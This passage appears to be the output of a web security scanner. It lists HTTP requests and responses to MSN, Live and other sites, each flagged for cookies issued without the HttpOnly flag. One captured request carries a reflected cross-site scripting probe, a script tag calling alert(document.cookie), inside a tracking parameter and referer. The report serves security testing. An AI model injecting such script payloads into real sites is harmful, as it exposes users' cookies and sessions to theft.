HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: https://sb.voicefive.com/b2? Date: Sun, 30 Jan 2011 01:37:06 GMT Connection: close Set-Cookie: UID=c9bed8b-173.223.190.110-1296351426; expires=Tue, 29-Jan-2013 01:37:06 GMT; path=/; domain=.voicefive.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: search.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Content-Length: 0 Location: http://www.bing.com/ P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.redacted/w3c/p3p.xml" X-Akamai-TestID: eb356f92ec934ef7abb977318c2c1fa7 Expires: Sun, 30 Jan 2011 01:37:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 30 Jan 2011 01:37:08 GMT Connection: close Set-Cookie: _HOP=I=1&TS=1296351428; domain=.redacted; path=/ Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.redacted; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /LoginStage.aspx HTTP/1.1 Host: security.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
mkt=ep=en-US; domain=.live.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /LoginStage.aspx?lmif=1000&ru=https://login.live.com/login.srf%3Fwa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26id%3D251248%26cbcxt%3Dhom%26vv%3D900%26mkt%3DEN-US%26lc%3D1033&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&cbid=0&id=64855 HTTP/1.1 Host: security.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: seedmagazine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /st?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601&cirf=http%3A%2F%2Fwww.reimage.com%2Flp%2Fnhome%2Findex.php%3Ftracking%3DNeudesic69f18%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E602f708c63d%26banner%3D%26banner%3D728x90-1%5C%26adgroup%3Ddirect%26ads_name%3Ddirect%26keyword%3Ddirect&ciprf=http%3A%2F%2Fburp%2Fshow%2F9 HTTP/1.1 Host: seg.admailtiser.com Proxy-Connection: keep-alive Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /signup.aspx?ru=http%3a%2f%2fmail.live.com%2f%3frru%3dinbox&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US&bk=1296342737&cru=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d11%26rver%3d6.1.6206.0%26wp%3dMBI%26wreply%3dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26lc%3d1033%26id%3d251248%26cbcxt%3dhom%26mkt%3den-US HTTP/1.1 Host: signup.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342838&rver=6.1.6206.0&wp=MBI_SSL&wreply=https:%2F%2Fsignup.live.com%2Fsignup.aspx%3Fru%3Dhttp%253a%252f%252fmail.live.com%252f%253frru%253dinbox%26wa%3Dwsignin1.0%26rpsnv%3D11%26ct%3D1296342524%26rver%3D6.1.6206.0%26wp%3DMBI%26wreply%3Dhttp:%252F%252Fmail.live.com%252F%253Frru%253Dhome%2526livecom%253D1%26lc%3D1033%26id%3D251248%26cbcxt%3Dhom%26mkt%3Den-US%26bk%3D1296342737%26cru%3Dhttps:%2F%2Flogin.live.com%2Flogin.srf%253fwa%253dwsignin1.0%2526rpsnv%253d11%2526rver%253d6.1.6206.0%2526wp%253dMBI%2526wreply%253dhttp:%25252F%25252Fmail.live.com%25252F%25253Frru%25253Dhome%252526livecom%25253D1%2526lc%253d1033%2526id%253d251248%2526cbcxt%253dhom%2526mkt%253den-US%26lic%3D1&lc=1033&id=68692 Server: Microsoft-IIS/7.0 Set-Cookie: mkt=ep=en-US; domain=.live.com; path=/; secure Set-Cookie: xid=ffbfad06-ce49-4990-af01-ca3897d55b66&&CO1xxxxxxC208&61; domain=.live.com; path=/; secure Set-Cookie: xidseq=1; domain=.live.com; path=/; secure Set-Cookie: mktstate=S=-1109498027&U=&E=en-us&B=en&P=; domain=.live.com; path=/; secure Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/; secure Set-Cookie: mkt2=marketing=en-us; domain=.signup.live.com; path=/; secure Set-Cookie: LD=; domain=.live.com; expires=Sat, 29-Jan-2011 21:33:58 GMT; path=/; secure X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo Date: Sat, 29 Jan 2011 23:13:57 GMT Connection: close Content-Length: 919
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&checkda=1&ct=1296342838&rver=6.1.6206.0&w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bloglist.aspx HTTP/1.1 Host: social.entertainment.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:49 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA52 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=339e672cfcfc4e9bb100367db460c745; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=32E934AA60CC44708EAEB1A4EA677746; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:49 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 49248
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /movies/blogs/the-hitlist-blog.aspx?feat=04db8167-2807-4c60-b794-b60b92d90ea8 HTTP/1.1 Host: social.entertainment.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:51 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA50 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=70a16c71a55c4c61a3a1f7e96fd37f9b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=496C3F39553B4397A714AABA23E48508; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:51 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 48741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /movies/blogs/videodrone-blog.aspx HTTP/1.1 Host: social.entertainment.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:53 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA53 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=95fdb1a67d8c452591b9b1d3553ca658; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=1219E6217C35489A85953685DFCF99E9; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:53 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 56969
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /movies/blogs/videodrone-blogpost.aspx HTTP/1.1 Host: social.entertainment.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:52 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA56 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=6d751073fa5b4121b2cd69496e39f021; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=8104721B1DA441FBA6658BE28078FA49; domain=.entertainment.msn.com; expires=Wed, 17-Aug-2011 23:50:52 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 22912
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Forums/en-US/windowsphone7series/threads HTTP/1.1 Host: social.msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 Set-Cookie: .ASPXANONYMOUS=_HXAcN3ezAEkAAAANTFiOTVkNDAtNzBkMy00OTlmLWIwYjgtMDcxN2MxMTZkMWFmbxOZ7JYQP3dzD3-g9V1k7zpmuBI1; expires=Sun, 29-Jan-2012 23:26:34 GMT; path=/; HttpOnly Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 28-Feb-2011 23:26:34 GMT; path=/ X-Powered-By: ASP.NET P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI Server: CO1VB21 Date: Sat, 29 Jan 2011 23:26:34 GMT Content-Length: 62798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_ctl00_Head ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:50:58 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA53 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=85e00d6e6f6c4a778e4031e134497c88; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=63CE5261B6254DBF87870C0B65E15402; domain=.redacted; expires=Thu, 18-Aug-2011 01:50:58 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 24408
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:21 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=47b7e33a132247bf8382137776d91eb8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=6378AE381CF74C0AB0F61F11DCCB43D6; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:21 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17250
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:19 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=a0e82ca105e74736bef180d33ad85b63; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=3D7690447A274FA6A7A5188FFB75CF63; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:19 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17128
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/Famous-February-birthdays.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:26 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA51 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=af42dcb823fb4382b27164e71b4553fa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=14EF63B027F946CD907C6E5D6601CA44; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:26 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17056
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/Jesse-James-ex-arrested.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:22 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA51 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=d363cc0566a641bbac227c396c72e6da; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=B5C6E6CBBD8140B1A45E68CFF623563E; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:22 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/PETAs-newest-naked-celeb.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:15 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA51 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=ce8cf853b593429c8c5ae3125646c35b; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=14CA8A1489AA49D39C1600720CAD343B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:15 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Entertainment/Unlikely-celebrity-friendships.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:25 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA51 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=b8024ffbe31247238960e8dad42e6ae0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=54B802C72C5D4A968AE6BEB7BEB43885; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:25 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17086
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Billionaires-caucus.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:06 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA54 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=509e6c71b5ba480d910bf7b7e5f60afe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=0BDAD1C110174CA4BA5911AED9744835; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:06 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17072
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:59 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=115826fb361947fba7a59745eee1a2fe; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=19D7523F04DB408783F64E4246E74057; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:59 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:10 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA50 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=686b26f612ef4ff886afcdf5b0daf95d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=64FF62872D864AAC8B7EAB35C97F487F; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:10 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Egypt-new-vp.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:58 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA56 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=075506e27db2457ab39ca3349aad58aa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=751919D3B46045639E5A7F4BB4D9E241; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:58 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17030
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Famous-escapes.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:57 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA50 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=1609e5a58c494ff581dac6b56594c457; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=5969A2C4E44346D5AD9CAFB1687B8DC5; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:57 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17042
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
